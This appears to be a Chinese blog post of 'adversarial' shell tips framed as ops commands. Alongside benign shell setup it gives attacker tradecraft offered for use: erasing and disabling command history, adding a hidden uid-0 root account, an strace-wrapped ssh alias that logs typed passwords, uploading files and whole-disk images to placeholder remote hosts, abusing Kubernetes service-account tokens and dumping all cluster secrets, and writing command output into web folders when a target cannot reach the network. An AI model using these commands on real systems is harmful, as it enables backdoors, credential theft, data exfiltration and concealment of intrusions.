对抗小技巧: 一些实用的运维命令
本来只是打算发几条实用命令,字数太少了干脆从笔记里面随便再捞几条放进来凑数2333
命令补全
1. `iterm2 + zsh + autosuggestions`
多终端历史命令同步
指定zsh写入的历史命令的路径,配合autosuggestions实用,对设备多的人来说非常实用
1. `#历史命令的`
2. `HISTFILE="$HOME/Library/Mobile Documents/com~apple~CloudDocs/zsh/.zsh_history"`
3. `#记录历史命令条数`
4. `HISTSIZE=100000`
5. `SAVEHIST=100000`
6. `setopt appendhistory`
同样的 $HOME/.ssh/, $HOME/.kube/一类的文件夹也可以配置自动同步
隐藏命令记录
入门
1. `set +o history`
进阶
1. `export HISTFILE=/dev/null`
高级
1. `unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0`
清除指定行历史命令
清除540行到566行。
1. `for h in $(seq 540 566 | tac); do history -d $h; done; history -d $(history 1 | awk '{print $1}')`
代理切换
alias(别名) 非常实用
1. `alias proxy="export ALL_PROXY=http://127.0.0.1:8080"`
2. `alias noproxy="export https_proxy= http_proxy= all_proxy="`
3. `alias ips="export all_proxy=\"socks5://xxxx:xxxx@proxypool:80\""`
替换jenv:
1. `alias jdk6="export JAVA_HOME=/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home"`
2. `alias jdk7="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home"`
3. `alias jdk8="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_151.jdk/Contents/Home"`
4. `alias jdk9="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-9.0.4.jdk/Contents/Home"`
5. `alias jdk10="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-10.0.2.jdk/Contents/Home"`
6. `alias jdk11="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-11.0.1.jdk/Contents/Home"`
7. `alias jdk12="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-12.0.1.jdk/Contents/Home"`
8. `alias jdk13="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-13.jdk/Contents/Home"`
9. `alias jdk14="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-14.0.1.jdk/Contents/Home"`
10. `alias jdk15="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-15.jdk/Contents/Home"`
禁止HOMEBREW自动更新
避免brew安装/更新程序是自动更新其他程序
1. `export HOMEBREW_NO_AUTO_UPDATE=true`
二进制程序统一管理
所有编译好的工具可以统一丢到这目录,无需在alias去链接程序绝对路径,同样也可以配置iCloud自动同步。
1. `export PATH=$PATH:/Users/$HOME/tools/bintools/`
当前IP查看
内外网ip
1. `ip(){`
2. `echo -e "\e[32m[+] 内网:\e[0m"`
3. `ifconfig|grep "inet "|awk -F ' ' '{print $2}'`
5. `echo -e "\n\e[31m[+] 公网:\e[0m"`
7. `curl cip.cc -s | tr -s '\n' '\n'`
8. `}`
9. `ip`
文件备份1
1. `cd /tmp`
2. `wget https://gosspublic.alicdn.com/ossutil/1.7.13/ossutil64 -O hulk`
3. `chmod +x hulk`
4. `echo "你的配置"|base64 -d > /tmp/.hulk`
5. `./hulk -c /tmp/.hulk cp /hulk.zip oss://xxxx/hulk.zip`
6. `rm -rf /tmp/.hulk`
文件备份2
curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'
1. `➜ ~ cat upload.py`
2. `from flask import Flask, request`
4. `app = Flask(__name__)`
6. `@app.route('/upload', methods=['POST'])`
7. `def upload():`
8. `file = request.files['file']`
9. `if ".." in file.filename:`
10. `return 'fuck u'`
11. `else:`
12. `file.save(file.filename)`
13. `return 'File saved successfully'`
16. `if __name__ == '__main__':`
17. `print("curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'")`
18. `app.run(debug=True, host='0.0.0.0', port=58000)`
linux整机备份
备份
1. `dd if=/dev/vda of=/path/to/backup.img bs=4M`
还原
1. `dd if=/path/to/backup.img of=/dev/vda bs=4M`
备份到远程
1. `dd if=/dev/vda bs=4M | gzip -c | ssh root@xxxx "cat > /tmp/xxx_backup.img.gz"`
还原:
1. `gunzip -c xxx_backup.img.gz > xxx_backup.img`
2. `dd if=xxx_backup.img of=/dev/vda bs=4M`
docker备份
1. `所有的`
2. `docker ps -a --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash`
4. `仅在允许的`
5. `docker ps --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash`
判断存在指定文件的docker容器
1. `docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}' | grep true | cut -c2- | awk '{print "docker exec "$1" [ -f /home/s/www/xxxx.png ] && echo "$1" has this file"}' | sh`
2. `trantor-fe has this file`
5. `docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}' | grep true | cut -c2- | awk '{print "docker exec "$1" [ -f /lib/ld-musl-x86_64.so.1 ] && echo "$1" has this file"}' | sh`
无netstat看网络连接
单项
1. `grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){`
2. `ret = 0`
3. `n = length(str)`
4. `for (i = 1; i <= n; i++) {`
5. `c = tolower(substr(str, i, 1))`
6. `k = index("123456789abcdef", c)`
7. `ret = ret * 16 + k`
8. `}`
9. `return ret`
10. `} {x=hextodec(substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."hextodec(substr($2,i,2))}{print x":"hextodec(substr($2,index($2,":")+1,4))}'`
双向
1. `awk 'function hextodec(str,ret,n,i,k,c){`
2. `ret = 0`
3. `n = length(str)`
4. `for (i = 1; i <= n; i++) {`
5. `c = tolower(substr(str, i, 1))`
6. `k = index("123456789abcdef", c)`
7. `ret = ret * 16 + k`
8. `}`
9. `return ret`
10. `}`
11. `function getIP(str,ret){`
12. `ret=hextodec(substr(str,index(str,":")-2,2));`
13. `for (i=5; i>0; i-=2) {`
14. `ret = ret"."hextodec(substr(str,i,2))`
15. `}`
16. `ret = ret":"hextodec(substr(str,index(str,":")+1,4))`
17. `return ret`
18. `}`
19. `NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp`
Linux一条命令添加用户
1. ``useradd -p `openssl passwd -1 -salt 'salt' P@ssw0rd` ibm2 -o -u 0 -g root -G root -s /bin/bash -d /home/guest``
ssh密码备份
1. ``alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'``
查看sa权限
1. `cd /run/secrets/kubernetes.io/serviceaccount/`
3. `curl --cacert $PWD/ca.crt --header "Authorization: Bearer $(cat $PWD/token)" -H 'Content-Type: application/json' -i -s -k -X 'POST' --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}' https://$KUBERNETES_SERVICE_HOST:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews`
etcd备份
1. `etcdctl --endpoints=http://xxxx:2379 snapshot save sec.db`
k8s备份
1. `kubectl get namespaces -o name > namespaces.txt`
2. `kubectl get all --namespace=default -o yaml > default-namespace-resources.yaml`
3. `kubectl get clusterroles -o yaml > clusterroles.yaml`
4. `kubectl get clusterrolebindings -o yaml > clusterrolebindings.yaml`
5. `kubectl get deployments --all-namespaces -o yaml > deployments.yaml`
6. `kubectl get configmaps --all-namespaces -o yaml > configmaps.yaml`
7. `kubectl get secrets --all-namespaces -o yaml > secrets.yaml`
8. `kubectl get pods --all-namespaces -o yaml > pods.yaml`
9. `kubectl get serviceaccounts --all-namespaces -o yaml > serviceaccounts.yaml`
10. `kubectl cluster-info dump > cluster-info.log`
查找高权限sa
1. `kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.serviceAccountName}{"\t"}{.spec.nodeName}{"\n"}{end}'`
kubectl安装
1. `curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"`
2. `chmod +x ./kubectl`
3. `mv ./kubectl /usr/local/bin/k`
4. `k auth can-i --list`
最近创建的pod
1. `kubectl get pods -A --sort-by=.metadata.creationTimestamp`
命令执行不出网
1. `Windows`
2. `for /f %i in ('dir /s /b e:index.js') do (echo %i> %i.test.txt)%26(ipconfig > %i.ipconfig.txt)"`
3. `linux`
4. `find / -name index.js|while read f;do sh -c 'id;pwd;ifconfig' >$(dirname $f)/test.txt;done`
ssh端口转发
1. `ssh -L 本地端口:目标主机:目标端口 uesr@host [-N]`
2. `ssh -L 5432:192.168.60.110:5432 sysadm@192.168.60.110 -p 2222`
相关推荐
